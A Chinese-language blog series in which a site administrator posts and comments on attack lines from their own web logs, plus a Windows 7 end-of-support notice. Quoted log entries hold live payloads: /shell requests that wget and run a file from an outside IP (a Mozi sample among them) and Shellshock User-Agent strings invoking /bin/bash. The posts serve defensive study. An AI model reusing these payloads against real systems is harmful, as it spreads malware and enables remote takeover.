從 Web Log 學習系統漏洞 57

221.201.195.5 - - [21/Jan/2020:15:38:05 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
119.82.83.81 - - [21/Jan/2020:16:04:16 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
49.82.30.71 - - [21/Jan/2020:17:02:18 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 297 "-" "Hello, world"
88.247.131.12 - - [21/Jan/2020:17:06:52 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
180.156.40.119 - - [21/Jan/2020:18:18:37 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
93.42.75.233 - - [21/Jan/2020:18:24:50 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
105.184.139.121 - - [21/Jan/2020:19:10:27 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226

最近很多這種莫名其妙的攻擊
估狗之後得知這是一種利用 Bash Shell 漏洞來進行遠端命令攻擊

wiki 中的 bashdoor 說明

從指令來看應該是專門針對 Linux 系統, 到指令中的 IP 去下載東西後再執行
查詢這 IP 91.92.66.124 是來自保加利亞
不曉得為什麼沒有被檢舉封鎖起來?
其中有一個蠻好笑的, 連線到 192.168.1.1 去下載? 還 Hello, world ? 是在哈囉?

從 Web Log 學習系統漏洞 56

昨晚來了一堆攻擊, 有幾段有趣的拿出來分享

從其中的關鍵字拿去估狗的結果, 發現一間國立大學某系網站有安裝這個編輯工具, 不曉得是不是這個編輯工具有漏洞所以被拿來做入侵測試? 順帶一提, 這國立大學網站的安全性不是做得很好, 因為 Index List 沒關所以被看光光

這個編輯工具能夠在瀏覽器上操作, 有興趣的可以自行搜尋

拿另外的關鍵字去餵狗搜尋到某一個奇怪的網站, 一樣也是沒關 Index List, 放了一堆空目錄, 但是每個裡面都有個JS檔

每個目錄裡面都有這個JS檔, 不曉得有什麼意義?

Windows 7 於 2020 年 1 月 14 日終止支援

Windows 7 已經使用 10 年了

微軟官網說明

2009 年 10 月 22 日發行 Windows 7 時，Microsoft 已承諾為其提供 10 年的產品支援。這段 10 年期間現在結束了，Microsoft 已停止對 Windows 7 的支援，好讓我們可以將投資集中於支援較新的技術和絕佳的新體驗。Windows 7 的明確終止支援日期是 2020 年 1 月 14 日。Windows Update 不再為此產品提供有助於保護電腦的技術協助和軟體更新。Microsoft 極力建議您移轉至 Windows 10，以免發生您需要服務或支援卻無從取得的狀況。

從 Web Log 學習系統漏洞 55

weblog 中出現這幾段記錄:

5.178.87.50 - - [07/Jan/2020:13:56:41 +0800] "GET // HTTP/1.1" 404 1833 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [07/Jan/2020:13:56:41 +0800] "GET //cgi-sys/realsignup.cgi HTTP/1.1" 404 220 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [07/Jan/2020:13:56:42 +0800] "GET //cgi-bin/test-cgi HTTP/1.1" 403 225 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [07/Jan/2020:13:56:42 +0800] "GET //cgi-bin/test.cgi HTTP/1.1" 403 225 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""

估狗之後發現這是一種針對 CGI 來做 Bash 遠端代碼執行漏洞

看它的攻擊方式是將指令寫在 User-Agent 中, 之前好像也有遇過類似的攻擊方式

() { :;};  這東西不曉得什麼意思
然後 echo 呼叫 /bin/bash
後面 echo 呼叫 2014 不曉得什麼意思
最後使用 md5sum 產生 dm5 查證碼

整段來看實在不曉得他想幹嘛, 不過網路上看到搭配一些程式碼能叫出系統環境值或是帳號檔內容

從 Web Log 學習系統漏洞 54

weblog 突然爆量, 一堆 phpmyadmin 的漏洞攻擊及其他多種混雜攻擊, 查了一下是間俄羅斯的公司, 應該也是被入侵當跳板